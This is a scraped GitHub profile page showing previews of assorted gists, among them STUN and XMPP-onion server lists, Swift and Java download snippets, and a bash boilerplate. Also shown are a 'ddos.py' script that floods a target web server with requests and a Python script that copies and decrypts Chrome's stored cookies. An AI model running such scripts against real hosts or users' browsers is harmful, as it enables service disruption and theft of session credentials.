Skip to content

Instantly share code, notes, and snippets.

View AlexDev404's full-sized avatar
🫤
I'm here.

Immanuel Daviel A. Garcia AlexDev404

🫤
I'm here.
View GitHub Profile
@mondain
mondain / public-stun-list.txt
Last active January 1, 2026 12:29
Public STUN server list
23.21.150.121:3478
iphone-stun.strato-iphone.de:3478
numb.viagenie.ca:3478
s1.taraba.net:3478
s2.taraba.net:3478
stun.12connect.com:3478
stun.12voip.com:3478
stun.1und1.de:3478
stun.2talk.co.nz:3478
stun.2talk.com:3478
$ pkgutil --expand swift-DEVELOPMENT-SNAPSHOT-2016-03-01-a-osx.pkg swift-DEVELOPMENT-SNAPSHOT-2016-03-01-a-osx
$ cd swift-DEVELOPMENT-SNAPSHOT-2016-03-01-a-osx
$ cd swift-DEVELOPMENT-SNAPSHOT-2016-03-01-a-osx-package.pkg
$ mv Payload Payload.zip
$ open .
double click to extract
$ cd Payload\ 2/usr/bin
$ ./swiftc -v
Apple Swift version 3.0-dev (LLVM b361b0fc05, Clang 11493b0f62, Swift 24a0c3de75)
@pwlin
pwlin / gist:8a0d01e6428b7a96e2eb
Last active November 24, 2025 03:23
Android : add cert to system store
https://code.google.com/p/android/issues/detail?id=32696#c5
If you have a certificate that is not
trusted by Android, when you add it, it goes in the personal cert store.
When you add a cert in this personal cert store, the system requires a
higher security level to unlock the device. But if you manage to add your
cert to the system store then you don't have this requirement. Obviously,
root is required to add a certificate to the system store, but it is quiet
easy.
@wahengchang
wahengchang / ddos.py
Created April 27, 2016 14:17 — forked from tinnguyenz/ddos.py
Python ddos script
import socket, sys, os
print "][ Attacking " + sys.argv[1] + " ... ]["
print "injecting " + sys.argv[2];
def attack():
#pid = os.fork()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 80))
print ">> GET /" + sys.argv[2] + " HTTP/1.1"
s.send("GET /" + sys.argv[2] + " HTTP/1.1\r\n")
s.send("Host: " + sys.argv[1] + "\r\n\r\n");
@mickeypash
mickeypash / web-whatsapp.js
Created May 7, 2016 21:35
This is the javascript process running the web client for whatsapp
This file has been truncated, but you can view the full file.
/*! Copyright (c) 2015 WhatsApp Inc. All Rights Reserved. */
webpackJsonp([84], [, function(e, t, r) {
"use strict";
function n() {
return u[Math.round(Math.random() * (u.length - 1))]
}
function o() {
this.logs = [], this.localCursor = 0, this.pending = void 0, this.timer = new d(this, this.persistIdb)
@dllud
dllud / xmpp-servers-tor-onion-service.md
Last active December 24, 2025 15:28
Public XMPP servers with Tor Hidden Service

Public XMPP servers with Tor Onion Service

This is a tentative list of public XMPP (Jabber) servers that provide a Tor Onion Service (.onion address) for connections from within the Tor network. By public I mean, servers that are free for everyone to use and place no barriers on registration.

Clearnet domain Tor Hidden Service In-Band registration XEP compliance
5222.de fzdx522fvinbaqgwxdet45wryluchpplrkkzkry33um5tufkjd3wdaqd.onion links to web form 100%
cock.li xdkriz6cn2avvcr2vks5lvvtmfojz2ohjzj4fhyuka55mvljeso2ztqd.onion disabled 30%
dismail.de 4colmnerbjz3xtsjmqogehtpbt5upjzef57huilibbq3wfgpsylub7yd.onion disabled 100%
@DakuTree
DakuTree / decryptchromecookies.py
Last active December 22, 2024 23:59
Decrypt Chrome Cookies File (Python 3) - Windows
#Based off https://gist.github.com/DakuTree/98c8362fb424351b803e & pieces of https://gist.github.com/jordan-wright/5770442
from os import getenv
from shutil import copyfile
import sqlite3
import win32crypt #https://sourceforge.net/projects/pywin32/
# Copy Cookies to current folder
copyfile(getenv("APPDATA") + "/../Local/Google/Chrome/User Data/Default/Cookies", './Cookies')
# Connect to the Database
@wavezhang
wavezhang / java_download.sh
Last active December 23, 2025 07:49
download java from oracle without login
wget -c --no-cookies --no-check-certificate --header "Cookie: oraclelicense=accept-securebackup-cookie" https://download.oracle.com/otn-pub/java/jdk/12.0.2+10/e482c34c86bd4bf8b56c0b35558996b9/jdk-12.0.2_linux-x64_bin.tar.gz
#!/usr/bin/sudo ruby
#
# revealer.rb -- Deobfuscate GHE .rb files.
#
# This is simple:
# Every obfuscated file in the GHE VM contains the following code:
#
# > require "ruby_concealer.so"
# > __ruby_concealer__ "..."
@sheharyarn
sheharyarn / bash-boilerplate.sh
Created October 29, 2016 21:51
Bash Script Boilerplate code
#!/usr/bin/env bash
# Bash3 Boilerplate. Copyright (c) 2014, kvz.io
set -o errexit
set -o pipefail
set -o nounset
# set -o xtrace
# Set magic variables for current file & dir
__dir="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"